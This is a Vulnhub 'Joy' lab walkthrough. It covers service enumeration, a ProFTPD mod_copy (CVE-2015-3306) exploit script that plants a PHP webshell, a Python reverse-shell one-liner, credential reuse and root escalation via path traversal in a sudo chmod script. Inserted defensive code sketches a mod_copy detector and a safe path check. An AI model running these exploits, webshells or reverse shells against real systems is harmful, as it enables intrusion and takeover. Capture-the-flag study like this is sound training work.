Vulnhub: Joy Machine, a Detailed Walkthrough
阿新 • Published: 2022-12-05
Joy
Author: jason_huawen
Basic information about the target
Name: digitalworld.local: JOY
URL:
https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ sudo netdiscover -i eth1
 Currently scanning: 192.168.59.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:9a:9e:c2      1      60  PCS Systemtechnik GmbH
 192.168.56.254  08:00:27:e4:d2:fe      1      60  PCS Systemtechnik GmbH
Using Netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.254.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-04 05:46 EST
Nmap scan report for localhost (192.168.56.254)
Host is up (0.00021s latency).
Not shown: 65523 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
|_drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2016-07-19 20:03  ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: CAPA TOP PIPELINING UIDL AUTH-RESP-CODE RESP-CODES STLS SASL
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: SASL-IR LITERAL+ IMAP4rev1 LOGIN-REFERRALS ENABLE Pre-login IDLE have post-login listed capabilities OK STARTTLS LOGINDISABLEDA0001 more ID
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
445/tcp open  netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: SASL-IR LITERAL+ IMAP4rev1 ENABLE Pre-login IDLE LOGIN-REFERRALS have post-login listed AUTH=PLAINA0001 capabilities OK more ID
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
995/tcp open  ssl/pop3    Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA TOP USER UIDL AUTH-RESP-CODE RESP-CODES PIPELINING SASL(PLAIN)
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
MAC Address: 08:00:27:E4:D2:FE (Oracle VirtualBox virtual NIC)
Service Info: Hosts:  The, JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 5h19m58s, deviation: 4h37m07s, median: 7h59m57s
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.5.12-Debian)
|   Computer name: joy
|   NetBIOS computer name: JOY\x00
|   Domain name: \x00
|   FQDN: joy
|_  System time: 2022-12-05T02:46:47+08:00
| smb2-time:
|   date: 2022-12-04T18:46:48
|_  start_date: N/A
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.29 seconds
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 The Good Tech Inc. FTP Server
Name (192.168.56.254:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||23165|)
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
226 Transfer complete
ftp> ls -alh
229 Entering Extended Passive Mode (|||46554|)
150 Opening ASCII mode data connection for file list
drwxr-x---   4 ftp      ftp          4.0k Jan  6  2019 .
drwxr-x---   4 ftp      ftp          4.0k Jan  6  2019 ..
drwxrwxr-x   2 ftp      ftp          4.0k Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4.0k Jan 10  2019 upload
226 Transfer complete
ftp> cd download
250 CWD command successful
ftp> ls -alh
229 Entering Extended Passive Mode (|||35903|)
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4.0k Jan  6  2019 .
drwxr-x---   4 ftp      ftp          4.0k Jan  6  2019 ..
226 Transfer complete
ftp> cd ..
250 CWD command successful
ftp> ls
229 Entering Extended Passive Mode (|||23286|)
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
226 Transfer complete
ftp> cd upload
250 CWD command successful
ftp> ls -alh
229 Entering Extended Passive Mode (|||39457|)
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4.0k Jan 10  2019 .
drwxr-x---   4 ftp      ftp          4.0k Jan  6  2019 ..
-rwxrwxr-x   1 ftp      ftp          1.9k Dec  4 18:48 directory
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_armadillo
-rw-rw-rw-   1 ftp      ftp            25 Jan  6  2019 project_bravado
-rw-rw-rw-   1 ftp      ftp            88 Jan  6  2019 project_desperado
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_emilio
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_flamingo
-rw-rw-rw-   1 ftp      ftp             7 Jan  6  2019 project_indigo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_komodo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_luyano
-rw-rw-rw-   1 ftp      ftp             8 Jan  6  2019 project_malindo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_okacho
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_polento
-rw-rw-rw-   1 ftp      ftp            20 Jan  6  2019 project_ronaldinho
-rw-rw-rw-   1 ftp      ftp            55 Jan  6  2019 project_sicko
-rw-rw-rw-   1 ftp      ftp            57 Jan  6  2019 project_toto
-rw-rw-rw-   1 ftp      ftp             5 Jan  6  2019 project_uno
-rw-rw-rw-   1 ftp      ftp             9 Jan  6  2019 project_vivino
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_woranto
-rw-rw-rw-   1 ftp      ftp            20 Jan  6  2019 project_yolo
-rw-rw-rw-   1 ftp      ftp           180 Jan  6  2019 project_zoo
-rwxrwxr-x   1 ftp      ftp            24 Jan  6  2019 reminder
226 Transfer complete
ftp> get reminder
local: reminder remote: reminder
229 Entering Extended Passive Mode (|||61399|)
150 Opening BINARY mode data connection for reminder (24 bytes)
100% |*********************************************************************************|    24       37.80 KiB/s    00:00 ETA
226 Transfer complete
24 bytes received in 00:00 (21.90 KiB/s)
ftp> get directory
local: directory remote: directory
229 Entering Extended Passive Mode (|||25671|)
150 Opening BINARY mode data connection for directory (1908 bytes)
100% |*********************************************************************************|  1908       90.98 MiB/s    00:00 ETA
226 Transfer complete
1908 bytes received in 00:00 (4.90 MiB/s)
ftp> get project_*
local: project_* remote: project_*
229 Entering Extended Passive Mode (|||22671|)
550 project_*: No such file or directory
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/04 05:53:24 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 302]
Progress: 219739 / 220561 (99.63%)===============================================================
2022/12/04 05:54:14 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ gobuster dir -u http://192.168.56.254/ossec/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254/ossec/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/04 05:54:43 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/img/]
/site (Status: 301) [Size: 321] [--> http://192.168.56.254/ossec/site/]
/css (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/css/]
/lib (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/lib/]
/README (Status: 200) [Size: 2106]
/js (Status: 301) [Size: 319] [--> http://192.168.56.254/ossec/js/]
/tmp (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/tmp/]
/LICENSE (Status: 200) [Size: 35745]
Progress: 219775 / 220561 (99.64%)===============================================================
2022/12/04 05:55:34 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ gobuster dir -u http://192.168.56.254/ossec/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254/ossec/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,sh,html
[+] Timeout: 10s
===============================================================
2022/12/04 05:56:09 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 13139]
/.html (Status: 403) [Size: 300]
/.php (Status: 403) [Size: 299]
/img (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/img/]
/site (Status: 301) [Size: 321] [--> http://192.168.56.254/ossec/site/]
/css (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/css/]
/lib (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/lib/]
/README (Status: 200) [Size: 2106]
/js (Status: 301) [Size: 319] [--> http://192.168.56.254/ossec/js/]
/setup.sh (Status: 200) [Size: 2471]
/tmp (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/tmp/]
/LICENSE (Status: 200) [Size: 35745]
/.php (Status: 403) [Size: 299]
/.html (Status: 403) [Size: 300]
Progress: 1101116 / 1102805 (99.85%)===============================================================
2022/12/04 06:00:32 Finished
===================================================
After the directory and file scans, and after visiting each of the directories and files found, none of them turned out to be exploitable.
Scan the UDP ports:
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ sudo nmap -sU --top-ports 50 192.168.56.254 -T4 -v
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-04 06:07 EST
Initiating ARP Ping Scan at 06:07
Scanning 192.168.56.254 [1 port]
Completed ARP Ping Scan at 06:07, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:07
Completed Parallel DNS resolution of 1 host. at 06:07, 0.01s elapsed
Initiating UDP Scan at 06:07
Scanning localhost (192.168.56.254) [50 ports]
Increasing send delay for 192.168.56.254 from 0 to 50 due to max_successful_tryno increase to 5
Discovered open port 161/udp on 192.168.56.254
Discovered open port 123/udp on 192.168.56.254
Increasing send delay for 192.168.56.254 from 50 to 100 due to max_successful_tryno increase to 6
Discovered open port 137/udp on 192.168.56.254
Warning: 192.168.56.254 giving up on port because retransmission cap hit (6).
Completed UDP Scan at 06:08, 23.89s elapsed (50 total ports)
Nmap scan report for localhost (192.168.56.254)
Host is up (0.00096s latency).
PORT STATE SERVICE
7/udp open|filtered echo
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
80/udp open|filtered http
111/udp closed rpcbind
123/udp open ntp
135/udp closed msrpc
136/udp closed profile
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
139/udp closed netbios-ssn
161/udp open snmp
162/udp open|filtered snmptrap
445/udp closed microsoft-ds
500/udp open|filtered isakmp
514/udp closed syslog
518/udp open|filtered ntalk
520/udp open|filtered route
593/udp closed http-rpc-epmap
626/udp closed serialnumberd
631/udp open|filtered ipp
996/udp open|filtered vsinet
997/udp closed maitrd
998/udp closed puparp
999/udp open|filtered applix
1025/udp open|filtered blackjack
1026/udp closed win-rpc
1027/udp open|filtered unknown
1433/udp open|filtered ms-sql-s
1434/udp open|filtered ms-sql-m
1645/udp closed radius
1646/udp closed radacct
1701/udp closed L2TP
1812/udp open|filtered radius
1900/udp open|filtered upnp
2048/udp closed dls-monitor
2049/udp closed nfs
2222/udp closed msantipiracy
3283/udp closed netassistant
3456/udp closed IISrpc-or-vat
4500/udp closed nat-t-ike
5060/udp closed sip
5353/udp open|filtered zeroconf
20031/udp open|filtered bakbonenetvault
32768/udp closed omad
49152/udp closed unknown
49153/udp closed unknown
49154/udp closed unknown
MAC Address: 08:00:27:E4:D2:FE (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 24.26 seconds
Raw packets sent: 273 (16.867KB) | Rcvd: 37 (3.808KB)
The UDP scan shows that the SNMP port is open, but it is of little value here, so the focus returns to FTP. The Nmap scan identified the service as ProFTPD but did not give a version. The directory file downloaded from FTP mentions a version_control file whose contents are unknown; let's see whether ProFTPD's mod_copy vulnerability can be used to copy it somewhere readable:
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ telnet 192.168.56.254 21
Trying 192.168.56.254...
Connected to 192.168.56.254.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/patrick/version_control
350 File or directory exists, ready for destination name
site cpto /home/ftp/upload/version_control
250 Copy successful
^Cquit
221 Goodbye.
Connection closed by foreign host.
Now connecting to the server over FTP again, the version_control file is visible; download it and view it locally:
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ cat version_control
Version Control of External-Facing Services:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12
We should switch to OpenSSH and upgrade ProFTPd.
Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
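The SITE CPFR / SITE CPTO exchange above is exactly what a defender should be watching for on port 21. The script below is an added example for this walkthrough, not the author's code: it pairs each CPFR with the CPTO that follows it in a captured FTP control-channel transcript (a constructed sample modelled on the session above, plus the /proc-handle and web-root pattern used by the public exploits for this bug) and reports copies whose source lies outside the FTP root, whose source is a /proc handle, or whose destination lands under a web document root. FTP_ROOT and WEB_ROOTS are assumed values, not stated on the page.

```python
import re
from dataclasses import dataclass
from posixpath import normpath

# Assumed layout (not stated on the page): the anonymous FTP root and the
# directories the web server serves from.
FTP_ROOT = "/home/ftp"
WEB_ROOTS = ("/var/www",)
SITE_RE = re.compile(r"^\s*SITE\s+(CPFR|CPTO)\s+(.+?)\s*$", re.IGNORECASE)

@dataclass
class CopyEvent:
    src: str
    dst: str
    reasons: tuple  # empty tuple means the copy looked benign

def _normalize(path: str) -> str:
    # mod_copy resolves relative names against the session cwd; the cwd is
    # assumed to be the FTP root, so a relative name is treated as inside it.
    if not path.startswith("/"):
        path = FTP_ROOT + "/" + path
    return normpath(path)

def _inside(path: str, root: str) -> bool:
    root = normpath(root)
    return path == root or path.startswith(root + "/")

def _reasons(src: str, dst: str) -> tuple:
    reasons = []
    if "<?" in src or "<?" in dst:
        reasons.append("script markup in path")
    nsrc, ndst = _normalize(src), _normalize(dst)
    if not _inside(nsrc, FTP_ROOT):
        reasons.append("source outside FTP root")
    if nsrc.startswith("/proc/"):
        reasons.append("source is a /proc handle")
    if not _inside(ndst, FTP_ROOT):
        reasons.append("destination outside FTP root")
    if any(_inside(ndst, w) for w in WEB_ROOTS):
        reasons.append("destination under web root")
    return tuple(reasons)

def analyze(transcript: str) -> list:
    """Pair each SITE CPFR with the next SITE CPTO and score the pair."""
    events, pending = [], None
    for line in transcript.splitlines():
        m = SITE_RE.match(line)
        if not m:
            continue  # server replies and other commands are ignored
        verb, arg = m.group(1).upper(), m.group(2)
        if verb == "CPFR":
            pending = arg
        elif verb == "CPTO" and pending is not None:
            events.append(CopyEvent(pending, arg, _reasons(pending, arg)))
            pending = None
    return events

def suspicious(transcript: str) -> list:
    return [e for e in analyze(transcript) if e.reasons]

# Constructed transcript: one legitimate copy inside the upload area, then
# the two patterns seen on this box (reading another user's file, and
# planting a file under the web root via a /proc file descriptor).
SAMPLE = """\
220 The Good Tech Inc. FTP Server
SITE CPFR /home/ftp/upload/reminder
350 File or directory exists, ready for destination name
SITE CPTO upload/reminder.bak
250 Copy successful
SITE CPFR /home/patrick/version_control
350 File or directory exists, ready for destination name
SITE CPTO /home/ftp/upload/version_control
250 Copy successful
SITE CPFR /proc/self/fd/3
350 File or directory exists, ready for destination name
SITE CPTO /var/www/tryingharderisjoy/infogen.php
250 Copy successful
"""
```

Feed it the client side of a ProFTPD session capture (or ExtendedLog output reduced to the command column) and alert on anything `suspicious()` returns.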
Now that the exact ProFTPD version is known, check for known vulnerabilities:
Exploit code found:
https://www.exploit-db.com/exploits/36803
Download it locally:
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ cat 36803.py
# Title: ProFTPd 1.3.5 Remote Command Execution
# Date : 20/04/2015
# Author: R-73eN
# Software: ProFTPd 1.3.5 with mod_copy
# Tested : Kali Linux 1.06
# CVE : 2015-3306
# Greetz to Vadim Melihow for all the hard work .
import socket
import sys
import requests
#Banner
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if(len(sys.argv) < 4):
    print '\n Usage : exploit.py server directory cmd'
else:
    server = sys.argv[1] #Vulnerable Server
    directory = sys.argv[2] # Path accessible from web .....
    cmd = sys.argv[3] #PHP payload to be executed
    evil = '<?php system("' + cmd + '") ?>'
    s.connect((server, 21))
    s.recv(1024)
    print '[ + ] Connected to server [ + ] \n'
    s.send('site cpfr /etc/passwd')
    s.recv(1024)
    s.send('site cpto ' + evil)
    s.recv(1024)
    s.send('site cpfr /proc/self/fd/3')
    s.recv(1024)
    s.send('site cpto ' + directory + 'infogen.php')
    s.recv(1024)
    s.close()
    print '[ + ] Payload sended [ + ]\n'
    print '[ + ] Executing Payload [ + ]\n'
    r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP
    if (r.status_code == 200):
        print '[ * ] Payload Executed Succesfully [ * ]'
    else:
        print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]'
    print '\n http://infogen.al/'
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ python2 36803.py 192.168.56.254 /ossec id
___ __ ____ _ _
|_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
| || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
| || | | | _| (_) | |_| | __/ | | | / ___ \| |___
|___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
[ + ] Connected to server [ + ]
id
^CTraceback (most recent call last):
File "36803.py", line 31, in <module>
s.recv(1024)
KeyboardInterrupt
Running it produced no result.
Found another exploit:
https://github.com/t0kx/exploit-CVE-2015-3306
┌──(kali㉿kali)-[~/Vulnhub/Joy/exploit-CVE-2015-3306-master]
└─$ python exploit.py --host 192.168.56.254 --port 21 --path "/var/www/tryingharderisjoy"
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 192.168.56.254:21
[+] Target exploited, acessing shell at http://192.168.56.254/backdoor.php
[+] Running whoami: www-data
[+] Done
Visit:
http://192.168.56.254/backdoor.php?cmd=id
The command output is returned successfully; next, obtain a reverse shell.
Visit:
http://192.168.56.254/backdoor.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.206%22,5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22])%27
The reverse shell is received on Kali Linux:
┌──(kali㉿kali)-[~/Vulnhub/Joy/exploit-CVE-2015-3306-master]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 36146
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@JOY:/var/www/tryingharderisjoy$ ls
ls
backdoor.php ossec
www-data@JOY:/var/www/tryingharderisjoy$ cd ossec
cd ossec
www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls -alh
ls -alh
total 116K
drwxr-xr-x 8 www-data www-data 4.0K Jan 6 2019 .
drwxr-xr-x 3 www-data www-data 4.0K Dec 5 03:31 ..
-rw-r--r-- 1 www-data www-data 92 Jul 19 2016 .hgtags
-rw-r--r-- 1 www-data www-data 262 Dec 28 2018 .htaccess
-rw-r--r-- 1 www-data www-data 44 Dec 28 2018 .htpasswd
-rwxr-xr-x 1 www-data www-data 317 Jul 19 2016 CONTRIB
-rw-r--r-- 1 www-data www-data 35K Jul 19 2016 LICENSE
-rw-r--r-- 1 www-data www-data 2.1K Jul 19 2016 README
-rw-r--r-- 1 www-data www-data 923 Jul 19 2016 README.search
drwxr-xr-x 3 www-data www-data 4.0K Jul 19 2016 css
-rw-r--r-- 1 www-data www-data 218 Jul 19 2016 htaccess_def.txt
drwxr-xr-x 2 www-data www-data 4.0K Jul 19 2016 img
-rwxr-xr-x 1 www-data www-data 5.1K Jul 19 2016 index.php
drwxr-xr-x 2 www-data www-data 4.0K Jul 19 2016 js
drwxr-xr-x 3 www-data www-data 4.0K Dec 28 2018 lib
-rw-r--r-- 1 www-data www-data 462 Jul 19 2016 ossec_conf.php
-rw-r--r-- 1 www-data www-data 134 Jan 6 2019 patricksecretsofjoy
-rwxr-xr-x 1 www-data www-data 2.5K Jul 19 2016 setup.sh
drwxr-xr-x 2 www-data www-data 4.0K Dec 28 2018 site
drwxrwxrwx 2 www-data www-data 4.0K Dec 28 2018 tmp
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat ossec_conf.php
cat ossec_conf.php
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
how would these hack3rs ever find such a page?
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su - root
su - root
Password: howtheheckdoiknowwhattherootpasswordis
su: Authentication failure
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su - root
su - root
Password: howtheheckdoiknowwhattherootpasswordis
su: Authentication failure
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su - patrick
su - patrick
Password: apollo098765
patrick@JOY:~$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),1001(ftp)
patrick@JOY:~$
Privilege escalation
patrick@JOY:~/.config$ sudo -l
sudo -l
Matching Defaults entries for patrick on JOY:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User patrick may run the following commands on JOY:
(ALL) NOPASSWD: /home/patrick/script/test
patrick@JOY:/tmp$ sudo -u root /home/patrick/script/test
sudo -u root /home/patrick/script/test
I am practising how to do simple bash scripting!
What file would you like to change permissions within this directory?
../../../../../../../etc/passwd
../../../../../../../etc/passwd
What permissions would you like to set the file to?
777
777
Currently changing file permissions, please wait.
Tidying up...
Done!
patrick@JOY:/tmp$ ls -alh /etc/passwd
ls -alh /etc/passwd
-rwxrwxrwx 1 root root 2.5K Jan 28 2019 /etc/passwd
patrick@JOY:/tmp$
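The test script above is shown only by its behaviour: it asks for a file name and a mode and runs chmod as root, and a ../ path walks it straight out of its own directory. The Python below is an added example, not the page's script (whose source is not shown), of the containment check such a script needs: base directory and requested path are both canonicalised with realpath before comparison, so '..' components, absolute paths and symlinks pointing out of the directory are all refused, and the mode is limited to three octal digits. SCRIPT_DIR is taken from the sudo -l entry; the demo works in a throw-away directory rather than touching /etc/passwd.

```python
import os
import tempfile

# Directory the sudo'd script was meant to manage (from the sudo -l entry).
SCRIPT_DIR = "/home/patrick/script"

class PathEscape(ValueError):
    """Requested path does not stay inside the managed directory."""

def resolve_inside(base_dir: str, user_path: str) -> str:
    """Canonicalise user_path relative to base_dir and refuse any escape.

    realpath is applied to both sides before comparing, so '..' components,
    absolute paths and symlinks that point out of base_dir are all caught.
    """
    real_base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(real_base, user_path))
    if os.path.commonpath([real_base, candidate]) != real_base:
        raise PathEscape(f"{user_path!r} resolves outside {base_dir}")
    return candidate

def parse_mode(mode_str: str) -> int:
    """Accept exactly three octal digits: no setuid, setgid or sticky bits."""
    if len(mode_str) != 3 or any(c not in "01234567" for c in mode_str):
        raise ValueError(f"bad mode {mode_str!r}")
    return int(mode_str, 8)

def safe_chmod(base_dir: str, user_path: str, mode_str: str) -> str:
    """What the script should do: validate both inputs, then chmod."""
    mode = parse_mode(mode_str)  # validate before touching anything
    target = resolve_inside(base_dir, user_path)
    os.chmod(target, mode)
    return target

def demo() -> dict:
    """Constructed scenario in a temporary directory (never /etc/passwd)."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "script")
        os.mkdir(base)
        inside = os.path.join(base, "notes.txt")
        open(inside, "w").close()
        outside = os.path.join(tmp, "passwd")  # stands in for /etc/passwd
        open(outside, "w").close()
        os.symlink(outside, os.path.join(base, "link"))

        target = safe_chmod(base, "notes.txt", "640")
        results["plain"] = target == os.path.realpath(inside)
        attempts = {
            "traversal": "../../../../../../../etc/passwd",  # the page's input
            "absolute": outside,
            "symlink": "link",
        }
        for name, path in attempts.items():
            try:
                safe_chmod(base, path, "777")
                results[name] = "allowed"
            except PathEscape:
                results[name] = "refused"
        try:
            parse_mode("4777")
            results["setuid"] = "allowed"
        except ValueError:
            results["setuid"] = "refused"
    return results
```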
